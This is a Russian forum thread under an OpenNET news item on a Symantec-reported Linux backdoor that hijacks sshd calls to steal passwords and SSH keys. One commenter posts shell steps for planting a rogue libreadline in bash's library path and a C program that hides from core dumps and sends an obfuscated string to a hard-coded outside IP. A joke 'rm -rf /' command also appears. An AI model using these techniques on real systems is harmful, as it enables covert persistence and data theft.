The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от opennews (ok) on 16-Ноя-13, 00:13 
Компания Symantec в результате разбора  атаки на одного из  крупных хостинг-провайдеров  выявила (http://www.symantec.com/connect/blogs/linux-back-door-uses-c...) новый вид бэкдора для Linux. Бэкдор выполнен в форме разделяемой библиотеки, перехватывающей ряд стандартных вызовов, таких как read, EVP_CipherInit, fork и ioctl. Библиотека связывается с работающими на системе сетевыми процессами, такими как sshd, берёт на себя обработку указанных вызовов и получает контроль над трафиком поражённых серверных приложений.


При работе бэкдор не сохраняет файлов, не создаёт сокетов и не инициирует сетевые соединения, прикрываясь в своей активности поражённым серверным процессом, что затрудняет его обнаружение. Управляющие команды передаются в составе штатного сетевого трафика, через интеграцию подставных блоков. Бэкдор отслеживает появление в нормальном, не вызывающем подозрение, трафике маску ":!;.", при обнаружении которой декодирует следующий за ней блок данных. Данные закодированы с использованием шифра Blowfish и следуют в формате Base64.


Через закодированные блоки, примешанные в обычный трафик, могут передаваться управляющие команды для выполнения произвольной shell-команды или отправки в ответ накопленных бэкдором данных. Основное функцией бэкдора является перехват и накопление конфиденциальных данных, таких как пароли, ключи шифрования и email-адреса. В частности, поддерживается перехват паролей и SSH-ключей пользователей, подсоединяющихся к поражённой системе.


В качестве методов выявления бэкдора может использоваться анализ наличия маски ":!;." в трафике. Но этот метод не эффективен, так как бэкдор может длительное время не проявлять себя. Более надёжным вариантом является сохранение дампа памяти работающего процесса sshd и поиск в нём специфичных для бэкдора строковых данных, таких как "key=", "dhost=", "hbt=3600", "sp=", "sk=" и "dip=".

URL: http://www.symantec.com/connect/blogs/linux-back-door-uses-c...
Новость: http://www.opennet.ru/opennews/art.shtml?num=38441

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –3 +/
Сообщение от Dcow (ok) on 16-Ноя-13, 00:13 
Вау LD_PRELOAD.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

18. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от pavlinux (ok) on 16-Ноя-13, 02:06 
# cp /bin/bash /tmp/
# cd /tmp
# readelf -a  ./bash  | grep PATH
0x000000000000000f (RPATH)              Library rpath: [/lib64/bash/4.2]
0x000000000000001d (RUNPATH)            Library runpath: [/lib64/bash/4.2]

# cp /tmp/libbackdoor.so /lib64/bash/4.2/
# ln -s /lib64/bash/4.2/libbackdoor.so /lib64/bash/4.2/libreadline.so.6
# ldd ./bash
/bin/bash: symbol lookup error: /bin/bash: undefined symbol: emacs_meta_keymap

Ну сами понимаете, надо сделать копию libreadline.so.6 со своими плюшками.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

56. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от fi (ok) on 16-Ноя-13, 14:21 
> /bin/bash: symbol lookup error: /bin/bash: undefined symbol: emacs_meta_keymap
> Ну сами понимаете, надо сделать копию libreadline.so.6 со своими плюшками.

Идея интересная, но там нет вызовов  read, EVP_CipherInit, fork и ioctl, нужен механизм preload.

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

86. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 16-Ноя-13, 19:47 
>libreadline
>нет вызовов read

Что еще расскажешь?

Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

63. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от burjui email(ok) on 16-Ноя-13, 16:02 
При чём тут бухта?
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –4 +/
Сообщение от A.Stahl on 16-Ноя-13, 00:13 
Т.е. чтобы эта штука заработала, мне надо скачать что-то неведомое, а потом ещё и запустить это из-под рута? Да ещё и не выгружать эту дрянь из памяти?
Думаю, я в безопасности.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –9 +/
Сообщение от Аноним (??) on 16-Ноя-13, 00:24 
Чем докажешь, что у тебя не Убунта на сервере да еще с иксами и софтом из ppa? :)
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

4. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +6 +/
Сообщение от Аноним (??) on 16-Ноя-13, 00:38 
Чем Убунта не угодила? У Гугл и Википедии проблем с ней нет.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

12. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +4 +/
Сообщение от Аноним (??) on 16-Ноя-13, 01:35 
Откуда инфа, что проблем нет?
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

32. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +5 +/
Сообщение от Аноним (??) on 16-Ноя-13, 06:38 
libastral подсказывает
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

48. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +2 +/
Сообщение от рыапыапр email on 16-Ноя-13, 11:47 
Для пользователей по крайней мере не заметно
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

69. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 16-Ноя-13, 17:54 
> Для пользователей по крайней мере не заметно

(ехдно) Успешный взлом и должен годами оставаться незаметным. Не только пользователям, но даже сисЯдмину. :)

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

102. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 17-Ноя-13, 14:56 
> (ехдно) Успешный взлом и должен годами оставаться незаметным. Не только пользователям,
> но даже сисЯдмину. :)

При том обычно кульсисопов ломают чаще чем википедии и гугли. Потому что у тех есть персонал который может за машинами нормально следить, в отличие от.

Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

13. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Antonim (ok) on 16-Ноя-13, 01:38 
Софт из ppa, лично мне, даже на домашней машине в голову не прийдет под рутом запускать. А на рабочих либо основные сервера, либо самому пакеты собирать, ну или у меня кое где лицензионные PPA стояли.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

15. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +11 +/
Сообщение от lucentcode (ok) on 16-Ноя-13, 01:56 
Лицензионных PPA не бывает. Сама абревиатура как бы намекает, что это персональные архивы пакетов, то есть за их содержимое отвечает какой-то Вася Пупкин, а не Canonical или сообщество. Если на сайте разработчика того, или иного ПО прямо не указан адрес PPA-репозитория, вполне возможно, что автор приложения, и владелец PPA, который выдаёт себя за автора - абсолютно разные люди. Где гарантия, что Вася - это Вася? И что он не подмешал какую-то дрянь к сорцам собранного им приложения? Вы пишете, что не запускаете под рутом софт из PPA. Похвально. Но знаете ли вы, что во время установки любого пакета, пакетный менеджер(работающий с привилегиями суперпользователя) может выполнить скрипт произвольного содержания? Вот материал(http://www.debian.org/doc/debian-policy/ch-maintainerscripts...), который стоит прочесть, перед тем, как вы надумаете в следующий раз устанавливать какую-то гадость из PPA.
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

35. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от pocqnchik on 16-Ноя-13, 08:31 
а как без рута?
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

89. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –2 +/
Сообщение от lucentcode (ok) on 16-Ноя-13, 19:54 
> а как без рута?

Никак. При установке пакета производятся действия, для которых необходимы повышенные привилегии. Вот поэтому ни в коем случае не стоит запускать пакет из неизвестного источника на установку. Я когда сомневаюсь - собираю пакетик ручками, и не имею потом проблем. Заодно можно собрать программу с нужными флагами сборки.

Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

103. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 17-Ноя-13, 14:57 
> неизвестного источника на установку. Я когда сомневаюсь - собираю пакетик ручками,
> и не имею потом проблем. Заодно можно собрать программу с нужными
> флагами сборки.

Вопрос на засыпку: что помешает при этом подпихнуть в скрипты сборки/установки или просто сорец программы что-нибудь бонусное? Врядли ты вычитываешь все это от и до...

Ответить | Правка | ^ к родителю #89 | Наверх | Cообщить модератору

105. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от lucentcode (ok) on 17-Ноя-13, 18:03 
А тут уже всё держится на доверии к разработчикам программы, и на их репутации. Проверять исходный код - дело трудоёмкое... Просто я больше склонен доверять разработчикам ПО, чем сомнительным личностям, собравшим пакетик не понятно из чего, и с какими намерениями. Была бы возможность автоматической проверки исходных кодов на не скрытый функционал - я бы с удовольствием сканировал сорцы, что-бы быть уверенным, что автор программы не оставил в ней бэкдора. А самому ковырять исходники как-то лениво... Да и бэкдор может быть не очевидным для не специалиста в нужной предметной области...
Ответить | Правка | ^ к родителю #103 | Наверх | Cообщить модератору

101. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 17-Ноя-13, 14:26 
wheel
Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

59. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 16-Ноя-13, 14:48 
Не совсем так. Часть ППА ведется как раз таки разработчиками, в том числе и из Каноникл. А вот левые ставить это да - бред, лучше самому скомпилять.
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

88. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от lucentcode (ok) on 16-Ноя-13, 19:51 
> Не совсем так. Часть ППА ведется как раз таки разработчиками, в том
> числе и из Каноникл. А вот левые ставить это да -
> бред, лучше самому скомпилять.

Верно. Но если об этом написано только на странице PPA, но об этом нет ни слова на сайте проекта, я бы усомнился, а точно ли разработчик создал ту, или иную PPA. Написать на страничке  PPA можно что угодно. Не нужно слепо этому верить. Доверяй, но проверяй:)


Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

91. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 16-Ноя-13, 21:41 
> Где гарантия, что Вася - это Вася?

В его ключах которыми подписываются пакеты, как и обычно. А вот доверять ли Васе или нет - это уже на вашей совести. Если в большом сообществе Васи более-менее прошли проверку временем и сотнями глаз, то с PPA уровень доверия Васям разумеется ниже. Тем не менее, у ряда Вась вполне нормальная репутация а подписи гарантируют что это именно тот Вася, а не какой-то самозванец.

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

96. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от lucentcode (ok) on 17-Ноя-13, 02:22 
Вот именно, что всё строится на доверии к тому, или иному персонажу... Проверил подпись, решил что доверяешь хозяину PPA - и понеслась установка пакетов. Но ведь не мало людей просто в бложике каком-то прочитали, что для установки пакета нужно добавить PPA и установить пакет, и больше их ничего не интересует...


Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

109. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 17-Ноя-13, 23:26 
> больше их ничего не интересует...

А уж сколько людей купилось на увещевания наперсточников на улице...

Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

60. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Mr. Cake on 16-Ноя-13, 15:00 
А ничего что при установке любого deb-пакета (в т. ч. из PPA) postinstall скрипт выполняется от рута? А ничего что пакет может содержать бинарник с флагом setuid?
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

5. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от vitalif (ok) on 16-Ноя-13, 00:52 
Ну с задачей "не выгружать это из памяти", видимо, отлично справится LD_PRELOAD )
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

14. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +4 +/
Сообщение от Пиу (ok) on 16-Ноя-13, 01:50 
не совсем
что это заработало, нужно найти дырку в похапе, потом из-за кривых настроек поднять себе привилегии до рутовых, а потом спрятаться в процессе sshd
вот это называется бэкдор. а то с чем вы спутали называется троян и к новости не относится
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

22. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +4 +/
Сообщение от Ordu email(ok) on 16-Ноя-13, 02:56 
Не, это называется проникновение в систему. А бекдор -- это то, что проникнувшие оставляют на память о своём проникновении.
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

21. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –2 +/
Сообщение от XoRe (ok) on 16-Ноя-13, 02:56 
> Думаю, я в безопасности.

Ога.
http://www.opennet.ru/opennews/art.shtml?num=36933

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

26. "Linux-бэкдор, организующий скрытый канал связи в..."  +1 +/
Сообщение от arisu (ok) on 16-Ноя-13, 04:05 
> Ога.

ога. не надо запускать всякое непонятное говно, найденое на помойке.

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

92. "Linux-бэкдор, организующий скрытый канал связи в..."  –1 +/
Сообщение от XoRe (ok) on 17-Ноя-13, 00:18 
>> Ога.
> ога. не надо запускать всякое непонятное говно, найденое на помойке.

По ссылке эксплоит, который может запустить простой юзер.
А у хостера таких простых юзеров с шеллами - тысячи.

Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

93. "Linux-бэкдор, организующий скрытый канал связи в..."  +1 +/
Сообщение от arisu (ok) on 17-Ноя-13, 00:21 
для особо тупых повторяю ещё раз: «не надо запускать всякое непонятное говно, найденое на помойке».
Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

98. "Linux-бэкдор, организующий скрытый канал связи в..."  –4 +/
Сообщение от linux must __RIP__ on 17-Ноя-13, 12:05 
для arisu повторяем - ты в своей песочнице на n900 можешь запускать что хочешь, а вот когда дело дойдет до хотера - они гады предоставляют шеловый доступ.. и далеко не каждый запускает юзера в отдельном контейнере. Вот же гады.. а выполнив код в ядре можно и selinux обойти..
Ответить | Правка | ^ к родителю #93 | Наверх | Cообщить модератору

108. "Linux-бэкдор, организующий скрытый канал связи в..."  +1 +/
Сообщение от Crazy Alex (ok) on 17-Ноя-13, 21:31 
ну туда им и дорога. Когда уже эти тупые шареды передохнут...
Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

110. "Linux-бэкдор, организующий скрытый канал связи в..."  +/
Сообщение от Аноним (??) on 17-Ноя-13, 23:28 
> что хочешь, а вот когда дело дойдет до хотера - они
> гады предоставляют шеловый доступ.. и далеко не каждый запускает юзера в
> отдельном контейнере.

Отлично, накоенец то поголовье извращенцев-пи...сов поубавится. Хотя-бы и при помощи невкусных пинков.

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

114. "Linux-бэкдор, организующий скрытый канал связи в..."  +/
Сообщение от XoRe (ok) on 20-Ноя-13, 21:18 
> для особо тупых повторяю ещё раз: «не надо запускать всякое непонятное говно,
> найденое на помойке».

Легко называть всех тупыми, когда админишь только localhost :)
Когда начнете админить что-то публичное, поймете, о чем я.

Ответить | Правка | ^ к родителю #93 | Наверх | Cообщить модератору

30. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +3 +/
Сообщение от Аноним (??) on 16-Ноя-13, 05:46 
>  Стандартные вопросы: как давно это существует, и как много кто этим
> смог воспользоваться? (А кто?) И зависит ли наличие уязвимости сей от
> того, какая это версия ядра, дистрибутива, или ПО в нем? (а
> если не на серверах, а в каком другом сетевом оборудовании, то
> там это все может ли быть?)
>  Может ли что подобное не выявленное где существовать еще?
>  (а Сноуден ничего там случайно об этом не знает? А то,-
> он же аж десятки тысяч црушных секретных документов тех тогда там
> раздобыл).

Это руткит, а не эксплоит. Он не эксплуатирует уязвимости, а позволяет атакующему закрпеться в успешно атакованной ранее системе.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

76. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от Пиу (ok) on 16-Ноя-13, 18:33 
но его наличие (и то что его нашли в дикой природе) указывает (как лакмусовая бумажка) на наличие дыры где-то. вопрос откуда он взялся - вот вопрос
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

78. "Linux-бэкдор, организующий скрытый канал связи в..."  +1 +/
Сообщение от arisu (ok) on 16-Ноя-13, 18:41 
в большинстве случаев это дыра в голове wannabe-админа.
Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

83. "Linux-бэкдор, организующий скрытый канал связи в..."  –1 +/
Сообщение от Пиу (ok) on 16-Ноя-13, 19:19 
> в большинстве случаев это дыра в голове wannabe-админа.

а в данном случае?

Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

85. "Linux-бэкдор, организующий скрытый канал связи в..."  +1 +/
Сообщение от arisu (ok) on 16-Ноя-13, 19:24 
>> в большинстве случаев это дыра в голове wannabe-админа.
> а в данном случае?

а вданном случае вообще бла-бла-бла. ни сэмпла, ни информации про пути распространения.

Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

112. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 18-Ноя-13, 11:11 
Используется одна из туч уязвимостей, за тебя все успешно устанавливает злоумышленник, а потом ты ничего никогда не заметишь, т к уверен в собственной безопасности.
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

7. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от fi (ok) on 16-Ноя-13, 01:15 
Круто! хорошо задумали, все думал когда будут такое использовать.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

87. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 16-Ноя-13, 19:49 
> Круто! хорошо задумали, все думал когда будут такое использовать.

Руткиты появились в незапамятные времена. И, кстати, изначально под юникс-системы. И техника перехвата функций до сокрытия своей деятельности и передачи данных атакующему тоже с длинной бородой.

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

10. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от ананим on 16-Ноя-13, 01:31 
Самого главного нет — как распространяерся?
Если "вручную", то не место сабжу в лучшем случае в мини-новостях.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

17. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от Lain_13 email(ok) on 16-Ноя-13, 02:06 
Распространяться оно может как угодно. Например, каким-нибудь пакетом автоматического поиска популярных дыр на серверах. Нашёл подходящие дыры — вкатил эту дрянь.
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

19. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Нанобот (ok) on 16-Ноя-13, 02:27 
вопрос был "как распространяется", а не "как может распространяться"
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

113. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 18-Ноя-13, 11:13 
> вопрос был "как распространяется", а не "как может распространяться"

Как может так и будет, при необходимости.
Бэкдор найден в дикой природе, а не сделан в лаборатории. Пострадал лион клиентов и крупный хостинг. Щас вам все напишут после расследования.

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

34. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от ананим on 16-Ноя-13, 07:30 
Как угодно — это бред, а не ответ.
Вот я придумал супер вредоносное ПО (rm -rf /). Распространите его плс.
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

51. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +4 +/
Сообщение от Аноним (??) on 16-Ноя-13, 12:05 
> Как угодно — это бред, а не ответ.
> Вот я придумал супер вредоносное ПО (rm -rf /). Распространите его плс.

Вы его как раз сейчас и распространили :)

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

65. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Anoybv on 16-Ноя-13, 17:00 
"Карачун тебе, Церители"

Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ

1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами -
наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Те же деяния, повлекшие по неосторожности тяжкие последствия, -
наказываются лишением свободы на срок до семи лет.

Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

58. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +3 +/
Сообщение от Evtomax email(ok) on 16-Ноя-13, 14:38 
Не работает :(

evtomax@debian ~> rm -rf /
rm: опасно рекурсивно обрабатывать «/»
rm: используйте --no-preserve-root, чтобы отменить предупреждение об опасности

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

107. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от ананим on 17-Ноя-13, 18:10 
Вот именно.
Вначале нужно как минимум стать рутом.

Так что сабж — это не бэкдор в линухе, а шибко умный (возможно бывший), но не чистый на руку админ из одной (только лишь) конторы.

В общем и не выиграл, и не в шахматы,... желтизна.

Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

11. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от tessel on 16-Ноя-13, 01:35 
Not bad. Отличная новость и очень здорово, что приведен быстровалидатор для проверки своих систем.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

23. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от pavlinux (ok) on 16-Ноя-13, 03:15 
Нукась, покажьте как вы просканили память ssh процесса?
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

24. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Lain_13 (ok) on 16-Ноя-13, 03:33 
Например, gcore pid, а потом грепать получившийся дамп.
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

31. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от pavlinux (ok) on 16-Ноя-13, 06:11 
грепай

Посигналу SIGUSR1 шлёт на сайт маздайя волшебную строку.

$ kill -USR1 `pidof a.out`


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>

int a[15] = { 53, 55, 50, 39, 52, 15, 50, 35, 53, 53, 57, 49, 52, 38 };

int main(void)
{
        char *arr;
        sigset_t *set;
        struct rlimit limit;
        int sig, i, len, y = 1;
        limit.rlim_cur = 0;
        limit.rlim_max = 0;
        sigemptyset(set);
        sigaddset(set, SIGUSR1);
        sigprocmask(SIG_BLOCK, set, NULL);
        setrlimit(RLIMIT_CORE, &limit);
        daemon(0, 0);
        for (sig = 0;;) {
                sigwait(set, &sig);
                switch (sig) {
                case (SIGUSR1):
                        mlockall(MCL_CURRENT | MCL_FUTURE);
                        arr = malloc(15);
                        for (i = 0; i < 14; i++) {
                                a[i] += 30;
                                memmove((void *)&arr[i], &a[i], 1);
                        }
                        struct sockaddr_in inaddr;
                        int fd = socket(PF_INET, SOCK_STREAM, 0);
                        memset((void *)&inaddr, 0, sizeof(inaddr));
                        inaddr.sin_family = PF_INET;
                        inaddr.sin_port = htons(80);
                        inaddr.sin_addr.s_addr = inet_addr("199.59.243.105");
                        setsockopt(fd, SOL_SOCKET, SO_OOBINLINE, &y,
                                   sizeof(int));
                        setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, (char *)&y,
                                   sizeof(int));
                        connect(fd, (struct sockaddr *)&inaddr, sizeof(inaddr));

                        send(fd, &arr[0], 14, MSG_DONTWAIT | MSG_EOR);

                        close(fd);
                        memset((void *)&inaddr, 0xff, sizeof(inaddr));
                        memset((void *)&inaddr, 0xaa, sizeof(inaddr));
                        memset((void *)&inaddr, 0, sizeof(inaddr));
                        memset(arr, 0xff, 16);
                        memset(arr, 0xaa, 16);
                        memset(arr, 0x0, 16);
                        free(arr);
                        arr = NULL;
                        munlockall();
                        continue;
                }
        }
        return 0;
}

Там посаны блоуфишем балуются, думашь такие косяки оставят?! :D

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

39. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –9 +/
Сообщение от Аноним (??) on 16-Ноя-13, 08:57 
> Там посаны блоуфишем балуются, думашь такие косяки оставят?! :D

Блоуфиш, это когда к каждому символу по единичке прибавляют, чтобы никто такой грозный шифр не догадался прочитать? Да, это крутые робяты.

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

70. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от Lain_13 (ok) on 16-Ноя-13, 17:55 
Сходи почитай и больше так не позорься: http://ru.wikipedia.org/wiki/Blowfish
А то, что ты сказал, называется шифром Цезаря.
Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

71. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +2 +/
Сообщение от Аноним (??) on 16-Ноя-13, 17:59 
>> Там посаны блоуфишем балуются, думашь такие косяки оставят?! :D
> Блоуфиш, это когда к каждому символу по единичке прибавляют, чтобы никто такой
> грозный шифр не догадался прочитать? Да, это крутые робяты.

Который ты путаешь с блоуджобом.

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

52. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от Lain_13 (ok) on 16-Ноя-13, 12:34 
В статье очень даже внятно сказано, что в дампе памяти процесса можно искать указанные строки, а вопрос был как получить дамп. Зашифровали б посоны код в памяти — фиг бы что грепать там было бы можно, а в данном случае значит не зашифровали.
Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

64. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от pavlinux (ok) on 16-Ноя-13, 16:36 
key=, dhost=, hbt=3600, sp=, sk=, dip=,... - это половые фантазии Симантека,
эти токены, можно сказать стандарт для ботнетов. Кто-то давно написал, вот
исходники и кочуют между хак-группами.

А бинарники, в дистрибутивах, проверяют на контрольные суммы:

# rpm -V  openssh
openssh
5S.T.....  c /etc/ssh/sshd_config
missing     /lib/systemd/system/sshd.service

# debsums openssh
...

Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

68. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от Lain_13 (ok) on 16-Ноя-13, 17:34 
Вообще-то «прелесть» данного бэкдора в том, что он цепляется к процессам в памяти и пользуется их соединениями и вклинивается в их трафик. Вставить же его в процесс автозагрузки можно уймой способов и без модификации бинарников. Так что проверка контрольных сумм файлов на винте тебе практически наверняка ничего не даст.

И знаешь, если Симантек написали, что в данном бэкдоре такие строки есть, то твоё мнение о их половых фантазиях мягко говоря неуместно если только ты не докажешь обратное. Доверять им в этом вопросе поводов больше, нежели тебе.

Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

80. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от pavlinux (ok) on 16-Ноя-13, 18:47 
Беги, покупай Symantec! Специально для таких новости создают!  :D

> Вообще-то «прелесть» данного бэкдора в том,

Если рут есть дальше можно не рассуждать. Вариантов - милльярд!

Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

81. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –2 +/
Сообщение от Lain_13 (ok) on 16-Ноя-13, 19:09 
Почему ты такой толстый?
Ответить | Правка | ^ к родителю #80 | Наверх | Cообщить модератору

82. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от pavlinux (ok) on 16-Ноя-13, 19:13 
14


Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

84. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от Lain_13 (ok) on 16-Ноя-13, 19:23 
А!
Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

95. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от pavlinux (ok) on 17-Ноя-13, 02:15 
> А!

Кто-то добрый тебя проминусовал :)
Эт ни я, чессово

Ответить | Правка | ^ к родителю #84 | Наверх | Cообщить модератору

97. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от Lain_13 (ok) on 17-Ноя-13, 06:24 
